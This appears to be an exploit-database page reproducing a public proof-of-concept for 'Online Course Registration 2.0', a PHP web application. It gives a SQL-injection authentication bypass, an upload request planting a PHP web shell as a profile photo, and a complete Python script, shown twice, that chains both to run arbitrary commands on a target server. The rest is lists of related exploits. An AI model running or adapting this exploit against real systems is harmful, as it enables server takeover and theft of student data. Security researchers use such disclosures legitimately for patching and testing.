Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Online Course Registration 2.0 - Remote Code Execution"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2020-01-03

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: v2.0
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
Attacker can bypass login page and access to student change password dashboard.

PoC Request (Authentication Bypass):

POST /onlinecourse/index.php HTTP/1.1
Host: target

regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=


There isn't any file extension control in student panel "My Profile" section.
An unauthorized user can upload php file as profile image.

First PoC Request (RCE):

POST /onlinecourse/my-profile.php HTTP/1.1
Host: target

-----------------------------16046344889164047791563222514
Content-Disposition: form-data; name="photo"; filename="simple.php"
Content-Type: application/x-php

<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>


Second PoC Request (RCE):

GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
Host: target


Below basic python script will bypass authentication and execute command on target server.





import requests
import sys                        

if (len(sys.argv) !=3) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath "
print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
exit(0)

rhost = sys.argv[1]
command = sys.argv[2]



url = "http://"+rhost+"/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
#bypass authentication
lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})

#check authentication bypass
check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
if check.status_code == 200:
print "[+] Authentication bypass was successfull"
else:
print "[-] Authentication bypass was unsuccessful"
sys.exit()

#upload simple php file

files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
furl = "http://"+rhost+"/my-profile.php"
session.post(url=furl, files= files, data=fdata)

#execution
final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)

#check execution
if final.status_code == 200:
print "[+] Command execution completed successfully."
print "\tPut on a happy face!\n"
else:
print "[-] Command execution was unsuccessful."
sys.exit()

print final.text

online-course-registration-rce.png

poc.py

import requests
import sys                         

if (len(sys.argv) !=3) or sys.argv[1] == "-h":
	print "[*] Usage: PoC.py rhost/rpath "
	print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
	exit(0) 

rhost = sys.argv[1]
command = sys.argv[2]



url = "http://"+rhost+"/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
	#bypass authentication
	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	
	#check authentication bypass
	check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
	if check.status_code == 200:
		print "[+] Authentication bypass was successfull"
	else:
		print "[-] Authentication bypass was unsuccessful"
		sys.exit()	 

	#upload simple php file

	files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
	fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
	furl = "http://"+rhost+"/my-profile.php"
	session.post(url=furl, files= files, data=fdata)
	
	#execution
	final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)

	#check execution
	if final.status_code == 200:
		print "[+] Command execution completed successfully.\n"
		print "\tPut on a happy face!\n"
	else:
		print "[-] Command execution was unsuccessful."
		sys.exit()

	print final.text
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-07-15 "SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)" webapps hardware "Metin Yunus Kandemir"
2020-07-08 "SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)" webapps hardware "Metin Yunus Kandemir"
2020-04-21 "CSZ CMS 1.2.7 - 'title' HTML Injection" webapps php "Metin Yunus Kandemir"
2020-04-21 "CSZ CMS 1.2.7 - Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2020-03-20 "Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)" webapps php "Metin Yunus Kandemir"
2020-01-07 "Complaint Management System 4.0 - Remote Code Execution" webapps php "Metin Yunus Kandemir"
2020-01-03 "Online Course Registration 2.0 - Remote Code Execution" webapps php "Metin Yunus Kandemir"
2020-01-01 "Shopping Portal ProVersion 3.0 - Authentication Bypass" webapps php "Metin Yunus Kandemir"
2020-01-01 "Hospital Management System 4.0 - Authentication Bypass" webapps php "Metin Yunus Kandemir"
2019-12-09 "Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-09-13 "Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-09-09 "Dolibarr ERP-CRM 10.0.1 - SQL Injection" webapps php "Metin Yunus Kandemir"
2019-09-09 "Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection" webapps php "Metin Yunus Kandemir"
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-12 "MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-06-24 "dotProject 2.1.9 - SQL Injection" webapps php "Metin Yunus Kandemir"
2019-05-29 "Free SMTP Server 2.5 - Denial of Service (PoC)" dos windows "Metin Yunus Kandemir"
2019-04-03 "PhreeBooks ERP 5.2.3 - Remote Command Execution" remote python "Metin Yunus Kandemir"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47843/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.